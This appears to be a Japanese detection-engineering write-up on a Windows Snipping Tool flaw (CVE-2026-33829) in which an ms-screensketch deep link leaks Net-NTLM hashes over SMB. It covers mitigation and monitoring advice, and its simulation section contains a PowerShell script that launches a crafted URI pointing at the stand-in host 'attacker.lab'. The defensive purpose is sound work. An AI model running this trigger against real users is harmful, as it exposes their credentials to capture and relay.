フォローする 
概要
WindowsのSnipping Toolにおける脆弱性が、現在ログインしているユーザーのNet-NTLMハッシュをリモート攻撃者に漏洩させる可能性があります。この問題は、 ms-screensketch URIスキームを悪用した悪意のあるディープリンクを介してトリガーされ、Snipping Toolが攻撃者が制御するSMB共有にホストされたファイルを開くことになります。被害者が作成されたリンクをクリックまたは開く必要がありますが、SMB接続の際にWindowsがバックグラウンドで認証情報を漏洩させるため、ユーザーには明示的な警告が表示されません。この振舞いにより、攻撃者はNTLM認証レスポンスデータにアクセスできるようになります。
調査
研究者たちは、この ms-screensketch プロトコルが filePath パラメータを受け入れ、任意のUNCパスを適切に制限していないことを発見しました。Snipping Toolがそのようなパスにアクセスしようとすると、Windowsは自動的にリモートSMBサーバーに認証を試み、プロセスでNTLMレスポンスを漏洩させます。この問題を立証するために、研究者たちはSMBリスナーを起動し、漏洩したハッシュをキャプチャする能力のある悪意のあるURIを生成しました。
緩和策
Microsoftは、2026年4月14日に、Snipping Toolから脆弱なディープリンクの挙動を削除したセキュリティアップデートをリリースしました。このパッチを適用することにより、信頼できないURIを通じて攻撃者が供給するSMBパスを自動的に開くことが防止されます。影響を受けているWindowsシステム全体でアップデートの展開を優先することで、露出をなくすことができます。
対応
防御者は、 ms-screensketch URIスキームを呼び出そうとする試みを監視し、通常ではない内部または外部ホストへのアウトバウンドSMB接続を警戒するべきです。Snipping Toolが不要なシステムには、可能であればプロトコルを制限し、パッチの展開を遅延なく強制する必要があります。露出したNTLMハッシュは、リプレイ、リレー、またはその他のフォローオンアビューズの兆候を確認するため、迅速に調査されるべきです。
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc action_user_click[“<b>アクション</b> – <b>T1204.001 ユーザー実行: 悪意のあるリンク</b><br/>ユーザーが悪意のあるリンクをクリックし、実行がトリガーされる。”] class action_user_click action tool_snipping[“<b>ツール</b> – <b>名称</b>: Snipping Tool (ms-screensketch URI)<br/><b>技術</b>: T1204 ユーザー実行<br/><b>説明</b>: ms-screensketch URIハンドラーを通じて起動される。”] class tool_snipping tool tech_smb_conn[“<b>技術</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping ToolはfilePathを処理し、攻撃者管理サーバーへのSMB接続を開始し、ハッシュの取得を可能にする。”] class tech_smb_conn technique tech_hash_capture[“<b>技術</b> – <b>認証情報アクセス</b><br/>攻撃者はSMB認証交換からNet-NTLMハッシュを取得する。”] class tech_hash_capture technique tech_lateral[“<b>技術</b> – <b>T1550.002 Pass the Hash</b><br/>取得されたハッシュは横方向移動または権限昇格に再利用される可能性がある。”] class tech_lateral technique tech_c2_web[“<b>技術</b> – <b>T1071.001 アプリケーション層プロトコル: Webプロトコル</b><br/>攻撃者はC2通信のためにHTTP/Sプロトコルを使用する可能性がある。”] class tech_c2_web technique tech_persistence[“<b>技術</b> – <b>T1574.006 実行フローのハイジャック: 動的リンカハイジャック</b><br/>Snipping Toolプロセスの動的リンカハイジャックによる永続化の可能性。”] class tech_persistence technique action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
攻撃フロー
シミュレーション実行
前提条件: テレメトリー&ベースラインのプレフライトチェックが合格していること。
理由: このセクションでは、検出ルールを引き起こすために設計された敵対者の技術(TTP)の正確な実行を詳細に説明します。コマンドと記述は、特定されたTTPを直接反映し、検出ロジックが期待する正確なテレメトリーを生成することを目的としています。
-
攻撃シナリオとコマンド:
攻撃者は被害者のワークステーションで足掛かりを得て、NTLMハッシュを疑いを持たせずに収集したいと考えています。攻撃者はCVE-2026-33829を活用し、
ms-screensketch:攻撃者が制御するSMB共有を指すURIを作成します(attacker.labsharepayload.png)。Snipping ToolがこのURIを処理すると、Windowsは自動的にリモートサーバーに対してSMB接続を開始し、マシンのNTLMレスポンスを漏洩します。攻撃者はPowerShellを使用してURIを実行し、Snipping Toolがユーザーコンテキストで起動することを確実にします。 -
回帰テストスクリプト:
# Snipping Tool経由のNTLM漏洩 – トリガースクリプト # UNCパスを制御したリスナーに合わせて調整します。 $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "悪意のあるURIでSnipping Toolを起動しています..." Start-Process $uri # SMBハンドシェイクが完了するまで数秒待機 Start-Sleep -Seconds 5 Write-Host "起動完了。SIEMで EventID 3 が '$attackerServer' を含む DestinationHostname をチェックしてください。" -
クリーンアップコマンド:
# 残留Snipping Toolプロセスがまだ実行中の場合は削除 Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # 任意: 攻撃者側で生成された一時ファイルを削除(存在する場合) # (共有への書き込み権限があることを前提とします) # Remove-Item -Path "$attackerServer$sharePath" -Force